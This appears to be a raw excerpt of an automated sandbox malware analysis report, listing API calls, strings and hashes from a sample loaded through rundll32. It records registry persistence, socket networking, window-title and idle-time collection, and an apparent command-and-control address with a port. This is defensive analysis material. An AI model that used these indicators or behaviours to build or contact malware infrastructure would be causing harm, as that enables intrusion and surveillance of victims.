                              • Instruction ID: 93ca8f5e9ee9c0a784eec75af29061d7f83117ce4cd940005baeb0483bb5f65a
                              • Opcode Fuzzy Hash: b47876c5398676345a9b57e5c024cdbc06a00509f4b1505159697864065484a3
                              • Instruction Fuzzy Hash: C7514CB1E00219DFDB04DFA4D848AEEB7B8FF48704F048169EA46A7750E634B945CBE1
                              APIs
                              • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 04205392
                              • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 042053A2
                              • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,0421C7D8,000012A0), ref: 042053C0
                              • RegCloseKey.KERNEL32(?), ref: 042053CB
                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0420541F
                              • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0420542B
                              • Sleep.KERNEL32(00000BB8), ref: 04205444
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                               • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                              • String ID: IpDates_info$SOFTWARE
                              • API String ID: 864241144-2243437601
                              • Opcode ID: 14ba62e7355e9d32d1c467ed3d9539e80b1975b97e48fb0a025daba82dbca7c7
                              • Instruction ID: a1ccf23cb7e1c693c440f052035b22f2be5ddb9300b37d773b3bfdffc8023406
                              • Opcode Fuzzy Hash: 14ba62e7355e9d32d1c467ed3d9539e80b1975b97e48fb0a025daba82dbca7c7
                              • Instruction Fuzzy Hash: 4241F532764241BBD310CF249809B7A7BE4EBA5744FDC9458E486961D3E7B0F881CF92
                              APIs
                              • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 04205392
                              • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 042053A2
                              • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,0421C7D8,000012A0), ref: 042053C0
                              • RegCloseKey.KERNEL32(?), ref: 042053CB
                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0420541F
                              • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0420542B
                              • Sleep.KERNEL32(00000BB8), ref: 04205444
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                               • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                              • String ID: IpDates_info$SOFTWARE
                              • API String ID: 864241144-2243437601
                              • Opcode ID: 7bbfc6945f8c07662aaaa09fc274e540deb5898c1a06615fb94af005a1448b2d
                              • Instruction ID: 15a463e809598def823cf6890f2d3679769257c443f42d8d4e97de3d0f7fd953
                              • Opcode Fuzzy Hash: 7bbfc6945f8c07662aaaa09fc274e540deb5898c1a06615fb94af005a1448b2d
                              • Instruction Fuzzy Hash: 9431C4303A4281BFD720CF209808B797BE4AFA8744F9C9498E5869A193D7B0F881CF51
                              APIs
                              • WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000081), ref: 6CBEB6BC
                              • ioctlsocket.WS2_32(?,8004667E,?), ref: 6CBEB6DA
                              • GetLastError.KERNEL32 ref: 6CBEB6F0
                              • GetLastError.KERNEL32 ref: 6CBEB736
                              • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 6CBEB83F
                              • GetLastError.KERNEL32 ref: 6CBEB84A
                              • closesocket.WS2_32(?), ref: 6CBEB9F0
                                • Part of subcall function 6CC47A4F: setsockopt.WS2_32(?,0000FFFF,?,?,00000004), ref: 6CC47A63
                              Strings
                              • tcp open errortcp set_nonblocking errortcp bind local error, xrefs: 6CBEB6F9
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorLast$IoctlSocketclosesocketioctlsocketsetsockopt
                              • String ID: tcp open errortcp set_nonblocking errortcp bind local error
                              • API String ID: 2822801258-1475804424
                              • Opcode ID: 758c5f6e1fd38a7aa236a6b3213e9d5b4d36f5e5691c3be49f2fcb537c361593
                              • Instruction ID: d1c4caf80f5a06151607f523fbf9e0a5c539bd7e68f3d41dccaed7778be5ad57
                              • Opcode Fuzzy Hash: 758c5f6e1fd38a7aa236a6b3213e9d5b4d36f5e5691c3be49f2fcb537c361593
                              • Instruction Fuzzy Hash: 81E1B0716083819FE714CF24C480B9ABBF1FF89B54F108A1DF9989B691D771D885CB86
                              APIs
                              • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6CC46BC7
                              • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 6CC46BDB
                              • memset.VCRUNTIME140(?,00000000,00000110,00000000,RtlGetVersion), ref: 6CC46BF9
                              • AcquireCredentialsHandleA.SECUR32(00000000,Microsoft Unified Security Protocol Provider,00000002,00000000,?,00000000,00000000,?,00000000), ref: 6CC46CA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: Handle$AcquireAddressCredentialsModuleProcmemset
                              • String ID: Microsoft Unified Security Protocol Provider$RtlGetVersion$bE$ntdll.dll
                              • API String ID: 166702113-1116218560
                              • Opcode ID: 6117cf1bb5bc2ab00e7dec8256bcfbf32b5c269a08f867043eaad451e0110db5
                              • Instruction ID: fa940e65551d64de0bef833ac67f17e7ce29466ce7a989ccbfbfeb79238eb5e5
                              • Opcode Fuzzy Hash: 6117cf1bb5bc2ab00e7dec8256bcfbf32b5c269a08f867043eaad451e0110db5
                              • Instruction Fuzzy Hash: 90714971A48B459BE320CF25C840B6AB7F4FFC9718F10CA1DE5889B681EB70E485CB55
                              APIs
                                • Part of subcall function 04207734: __fassign.LIBCMT ref: 0420772A
                              • Sleep.KERNEL32(00000000), ref: 0420615C
                                • Part of subcall function 042070D7: _malloc.LIBCMT ref: 042070F1
                              • Sleep.KERNEL32(00000000), ref: 042062C1
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0420630D
                                • Part of subcall function 04202C60: WSAStartup.WS2_32(00000202,?), ref: 04202CBF
                                • Part of subcall function 04202C60: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04202CCA
                                • Part of subcall function 04202C60: InterlockedExchange.KERNEL32(00000018,00000000), ref: 04202CD8
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04206357
                              • CloseHandle.KERNEL32(?), ref: 04206375
                              • CloseHandle.KERNEL32(?), ref: 04206382
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                               • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: CloseCreateEventHandleSleep$ExchangeInterlockedObjectSingleStartupWait__fassign_malloc
                              • String ID: 45.204.213.99$7677
                              • API String ID: 3083163006-1603803548
                              • Opcode ID: 1e8d45e5aa831b625a9788dec161b2664d398bd4e0bcf30ed3562338046291cd
                              • Instruction ID: 7df508c2e0ec7c6385577549e2f683f0f94786f988e5c5a22fa7a355082c46fd
                              • Opcode Fuzzy Hash: 1e8d45e5aa831b625a9788dec161b2664d398bd4e0bcf30ed3562338046291cd
                              • Instruction Fuzzy Hash: 0051C8B0B61205AFDB10DFA8E8C596EBBF5EFA8714F104125E010A7292CE74BD41CFA1
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000029), ref: 6CC14C4B
                              • memmove.VCRUNTIME140(?,?,00000029), ref: 6CC14D08
                              • memmove.VCRUNTIME140(?,?,00000029), ref: 6CC14D40
                              • memmove.VCRUNTIME140(?,?,000000D0), ref: 6CC14DC4
                              • memmove.VCRUNTIME140(?,?,000000D4), ref: 6CC14DDB
                              • memmove.VCRUNTIME140(?,?,000000D4), ref: 6CC14E62
                              • memmove.VCRUNTIME140(?,?,00000114), ref: 6CC14F5D
                              • memmove.VCRUNTIME140(?,?,00000114), ref: 6CC1502A
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC15052
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC15104
                              • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CC1534C
                              • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CC15381
                              • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CC15832
                              • memmove.VCRUNTIME140(?,?,00000118), ref: 6CC15EB4
                              • memmove.VCRUNTIME140(?,?,0000011C), ref: 6CC15ED2
                              • memmove.VCRUNTIME140(0000002C,?,0000011C), ref: 6CC15F29
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: U9W{
                              • API String ID: 2162964266-3288374708
                              • Opcode ID: fe0a8e54bb1729b1e81785b64a5a260c002d1bfa04f08463dfdc38c3afe2665c
                              • Instruction ID: 64ab14800f82ed232d3c8f84798c8ddb6b0b60b60415b703a4e2280f0d414d8a
                              • Opcode Fuzzy Hash: fe0a8e54bb1729b1e81785b64a5a260c002d1bfa04f08463dfdc38c3afe2665c
                              • Instruction Fuzzy Hash: C112AE75908B858FC722CF25C4807DBB7F5BF8A341F044A6DD8891F642EB70A589DB92
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000110,?,?,6CCB5F8C,6CCB5F64), ref: 6CC02202
                              • memmove.VCRUNTIME140(?,?,00000110,?,?,?,?,?,6CCB5F8C,6CCB5F64), ref: 6CC0222D
                              Strings
                              • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CC020E0
                              • cannot poll Select twice, xrefs: 6CC020FC
                              • dns error, xrefs: 6CC0154C
                              • invalid URL, scheme is not httpinvalid URL, scheme is missinginvalid URL, host is missingConnectError, xrefs: 6CC011EC
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: cannot poll Select twice$dns error$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs$invalid URL, scheme is not httpinvalid URL, scheme is missinginvalid URL, host is missingConnectError
                              • API String ID: 2162964266-100685727
                              • Opcode ID: 544f5beb891f6fa8c3723762f1b9c8b3dba5ace2d9edd1441df9c84951ed29e3
                              • Instruction ID: 4aada4d41ffb0beeb3c5402e26dacec6d95540ab9af558e807324925b33fcf11
                              • Opcode Fuzzy Hash: 544f5beb891f6fa8c3723762f1b9c8b3dba5ace2d9edd1441df9c84951ed29e3
                              • Instruction Fuzzy Hash: 7FB26C31A08B448FC725CF28C49079AF7F1FF89354F148A1EE89D9B651EB71A985CB42
                              APIs
                              • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,04DD12F8,B7FCE562,00000001,00000000,00000000), ref: 04DBCA31
                              • RegQueryInfoKeyW.ADVAPI32(04DD12F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 04DBCA60
                              • _memset.LIBCMT ref: 04DBCAC4
                              • _memset.LIBCMT ref: 04DBCAD3
                              • RegEnumValueW.KERNEL32(04DD12F8,?,00000000,?,00000000,?,00000000,?), ref: 04DBCAF2
                                • Part of subcall function 04DBF667: _malloc.LIBCMT ref: 04DBF681
                                • Part of subcall function 04DBF667: std::exception::exception.LIBCMT ref: 04DBF6B6
                                • Part of subcall function 04DBF667: std::exception::exception.LIBCMT ref: 04DBF6D0
                                • Part of subcall function 04DBF667: __CxxThrowException@8.LIBCMT ref: 04DBF6E1
                              • RegCloseKey.KERNEL32(04DD12F8,?,?,?,?,?,?,?,?,?,?,?,00000000,04DD12F8,000000FF), ref: 04DBCC03
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                              • String ID: Console\0
                              • API String ID: 1348767993-1253790388
                              • Opcode ID: 676b63c49d45405b07e72a9b31783cc6f7b579accc9eeb57bdcb17c05d63510a
                              • Instruction ID: eb199c90e8ec9d0f08a7871add42ba4d40cd6adcb21bb6a479bb103ea91a25c2
                              • Opcode Fuzzy Hash: 676b63c49d45405b07e72a9b31783cc6f7b579accc9eeb57bdcb17c05d63510a
                              • Instruction Fuzzy Hash: F7611CB1A01219EFDB04DFA8D880EEEB7B9FB48714F14456AE916E7341D735A901CBA0
                              APIs
                                • Part of subcall function 04DBF667: _malloc.LIBCMT ref: 04DBF681
                              • _memset.LIBCMT ref: 04DBBAA1
                              • GetLastInputInfo.USER32(?), ref: 04DBBAB7
                              • GetTickCount.KERNEL32 ref: 04DBBABD
                              • wsprintfW.USER32 ref: 04DBBAE6
                              • GetForegroundWindow.USER32 ref: 04DBBAEF
                              • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 04DBBB03
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                              • String ID: %d min
                              • API String ID: 3754759880-1947832151
                              • Opcode ID: 5da42c4a30e2c8e06e33422632983acd0af0d1227e01ed4ecfbcd90e348b639c
                              • Instruction ID: 4bad11ad2164d08eeba46f8d7978e74841d2fb0ff25f7e31343148cc9ffb74bb
                              • Opcode Fuzzy Hash: 5da42c4a30e2c8e06e33422632983acd0af0d1227e01ed4ecfbcd90e348b639c
                              • Instruction Fuzzy Hash: 264180B5A00104EBDB14DFA4DC88EDEBBB8EF48700F048159E94A9B355D674BA04CBE1
                              APIs
                              • GetCurrentProcessId.KERNEL32(B7FCE562,00000000,00000000,00000994,?,00000000,04DD10DB,000000FF,?,04DB6A43,00000000), ref: 04DB68C8
                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,04DD10DB,000000FF,?,04DB6A43,00000000), ref: 04DB68D7
                              • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,04DD10DB,000000FF,?,04DB6A43,00000000), ref: 04DB68F0
                              • CloseHandle.KERNEL32(00000000,?,00000000,04DD10DB,000000FF,?,04DB6A43,00000000), ref: 04DB68FB
                              • SysStringLen.OLEAUT32(00000000), ref: 04DB694E
                              • SysStringLen.OLEAUT32(00000000), ref: 04DB695C
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,04DD10DB,000000FF), ref: 04DB69BE
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,04DD10DB,000000FF), ref: 04DB69C4
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CloseHandleProcess$OpenString$CurrentToken
                              • String ID:
                              • API String ID: 429299433-0
                              • Opcode ID: ad342f2705bd4d4fdfd93e65391df7e16f1e28db384d5902ca8218c8e4960f24
                              • Instruction ID: a623731be2830ca2598bd0022ef0eb75af7bdae92930d610d2e7785875384cc0
                              • Opcode Fuzzy Hash: ad342f2705bd4d4fdfd93e65391df7e16f1e28db384d5902ca8218c8e4960f24
                              • Instruction Fuzzy Hash: 4641A1B2A00215DBDB11DFA8CC80AEEB7B8FB45704F144569E996F7340E635A900CBE1
                              APIs
                              Strings
                              • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 6CBE7E79
                              • assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 6CBE7E8B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorLast$getpeernamegetsockname
                              • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
                              • API String ID: 1444953621-3544120690
                              • Opcode ID: c5d2965c9ba57fc75f3414c8ea2ec2ae1673657f1240f3f9f77d1fd7062722dc
                              • Instruction ID: 09f8e2b9d40287e17c923a777101587b4a5735338444fd3a9cc1237f2f479c60
                              • Opcode Fuzzy Hash: c5d2965c9ba57fc75f3414c8ea2ec2ae1673657f1240f3f9f77d1fd7062722dc
                              • Instruction Fuzzy Hash: BDA16B30808B809AD315CF29C4416ABB7F4FFCA754F009A0DF8D9AB661E7B58985DB43
                              APIs
                              • __aulldiv.LIBCMT ref: 6CBEB5A6
                              • __aulldiv.LIBCMT ref: 6CBEB5E8
                              • WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000081), ref: 6CBEB6BC
                              • ioctlsocket.WS2_32(?,8004667E,?), ref: 6CBEB6DA
                              • closesocket.WS2_32(?), ref: 6CBEB9F0
                              Strings
                              • tcp set_nonblocking errortcp bind local error, xrefs: 6CBEB750
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: __aulldiv$Socketclosesocketioctlsocket
                              • String ID: tcp set_nonblocking errortcp bind local error
                              • API String ID: 2345199343-2725198832
                              • Opcode ID: 1d203ed30722f0168e89acee2842f958bcedb555088240f4055446252d71f79c
                              • Instruction ID: 44d6fe3b481e30ccb7f0a6cce53aecbfd33499f831b4c762284596622ad4f9c1
                              • Opcode Fuzzy Hash: 1d203ed30722f0168e89acee2842f958bcedb555088240f4055446252d71f79c
                              • Instruction Fuzzy Hash: 785121302047409FD708CF19C880B6AB7F6EF89794F10CA2DF5598B281E770E845CB92
                              APIs
                              • _memset.LIBCMT ref: 04DB6D59
                              • RegOpenKeyExW.KERNEL32(80000001,04DD5164,00000000,00020019,000008CC), ref: 04DB6D7C
                              • RegQueryValueExW.KERNEL32(000008CC,GROUP,00000000,00000001,?,00000208), ref: 04DB6DCA
                              • lstrcmpW.KERNEL32(?,04DD5148), ref: 04DB6DE0
                              • lstrcpyW.KERNEL32(04DB5676,?), ref: 04DB6DF2
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                              • String ID: GROUP
                              • API String ID: 2102619503-2593425013
                              • Opcode ID: cb7c78a5b2f61a91b412c1a7bc999460be8e7736259984e8fb0c5f4bc8974c5c
                              • Instruction ID: 00006f489578a8d7f918a362a70f61ae1b27b0c188bfd8e4c67898a7baa28067
                              • Opcode Fuzzy Hash: cb7c78a5b2f61a91b412c1a7bc999460be8e7736259984e8fb0c5f4bc8974c5c
                              • Instruction Fuzzy Hash: DA316571A41319EBDB20DF90DD89BDEB7B8FB48714F104299E506A7280DB74EA44CFA1
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 04DBF9AE
                              • __calloc_crt.LIBCMT ref: 04DBF9BA
                              • __getptd.LIBCMT ref: 04DBF9C7
                              • CreateThread.KERNEL32(00000000,00000000,04DBF924,00000000,00000000,04DBDF63), ref: 04DBF9FE
                              • GetLastError.KERNEL32(?,00000000,?,?,04DBDF63,00000000,00000000,04DB5ED0,00000000,00000000,00000000), ref: 04DBFA08
                              • _free.LIBCMT ref: 04DBFA11
                              • __dosmaperr.LIBCMT ref: 04DBFA1C
                                • Part of subcall function 04DBF87B: __getptd_noexit.LIBCMT ref: 04DBF87B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                              • String ID:
                              • API String ID: 155776804-0
                              • Opcode ID: 3932d915ccb5a01967047440b5381136c333e5ba4a151eb145e67725ec327245
                              • Instruction ID: ed836bd8c36f0173b7d8fa4c98c6645c90ce2e1a319057e7917871171fd82246
                              • Opcode Fuzzy Hash: 3932d915ccb5a01967047440b5381136c333e5ba4a151eb145e67725ec327245
                              • Instruction Fuzzy Hash: E411CE32300706EFAB15AFA4DC809DB37E8EF09768B10402DF986D7150DB30E8018AB1
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 04207400
                              • __calloc_crt.LIBCMT ref: 0420740C
                              • __getptd.LIBCMT ref: 04207419
                              • CreateThread.KERNEL32(?,?,04207376,00000000,?,?), ref: 04207450
                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 0420745A
                              • _free.LIBCMT ref: 04207463
                              • __dosmaperr.LIBCMT ref: 0420746E
                                • Part of subcall function 042072CD: __getptd_noexit.LIBCMT ref: 042072CD
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                              • String ID:
                              • API String ID: 155776804-0
                              • Opcode ID: 970085bbc74a556762baab78e68388534805f6bb3890b2bf606bc78a83e80f97
                              • Instruction ID: 71a93f80cd5fc85662d7a7b699c5419b5483c0157617c87855e33205f98c4b32
                              • Opcode Fuzzy Hash: 970085bbc74a556762baab78e68388534805f6bb3890b2bf606bc78a83e80f97
                              • Instruction Fuzzy Hash: 2E11E932320706AFE711AFB5DC4099B7BE9EF85374B10C125F955861D3DB75F40086A1
                              APIs
                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,04DB74A3), ref: 04DB73BD
                              • GetProcAddress.KERNEL32(00000000), ref: 04DB73C4
                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,04DB74A3), ref: 04DB73D2
                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,04DB74A3), ref: 04DB73DA
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: InfoSystem$AddressHandleModuleNativeProc
                              • String ID: GetNativeSystemInfo$kernel32.dll
                              • API String ID: 3433367815-192647395
                              • Opcode ID: 0b45bb9d620794a3cfd0a1ad45d3f8c41d4161ddfd3ae523d742d1a4e071d442
                              • Instruction ID: 3daec2589c73619c083c7ffea06e492bdbcbc5283f722d349c6407aba7d1a8d1
                              • Opcode Fuzzy Hash: 0b45bb9d620794a3cfd0a1ad45d3f8c41d4161ddfd3ae523d742d1a4e071d442
                              • Instruction Fuzzy Hash: F901D670E012099FCF50DFB899556EEBBF5EB48300F5045A9D95AE2340E67AAA408BA1
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 04DBF92A
                                • Part of subcall function 04DC3C86: TlsGetValue.KERNEL32(00000000,04DC3DDF,?,04DC44E0,00000000,00000001,00000000,?,04DC8DE6,00000018,04DD6448,0000000C,04DC8E76,00000000,00000000), ref: 04DC3C8F
                                • Part of subcall function 04DC3C86: DecodePointer.KERNEL32(?,04DC44E0,00000000,00000001,00000000,?,04DC8DE6,00000018,04DD6448,0000000C,04DC8E76,00000000,00000000,?,04DC3EEC,0000000D), ref: 04DC3CA1
                                • Part of subcall function 04DC3C86: TlsSetValue.KERNEL32(00000000,?,04DC44E0,00000000,00000001,00000000,?,04DC8DE6,00000018,04DD6448,0000000C,04DC8E76,00000000,00000000,?,04DC3EEC), ref: 04DC3CB0
                              • ___fls_getvalue@4.LIBCMT ref: 04DBF935
                                • Part of subcall function 04DC3C66: TlsGetValue.KERNEL32(?,?,04DBF93A,00000000), ref: 04DC3C74
                              • ___fls_setvalue@8.LIBCMT ref: 04DBF948
                                • Part of subcall function 04DC3CBA: DecodePointer.KERNEL32(?,?,?,04DBF94D,00000000,?,00000000), ref: 04DC3CCB
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 04DBF951
                              • ExitThread.KERNEL32 ref: 04DBF958
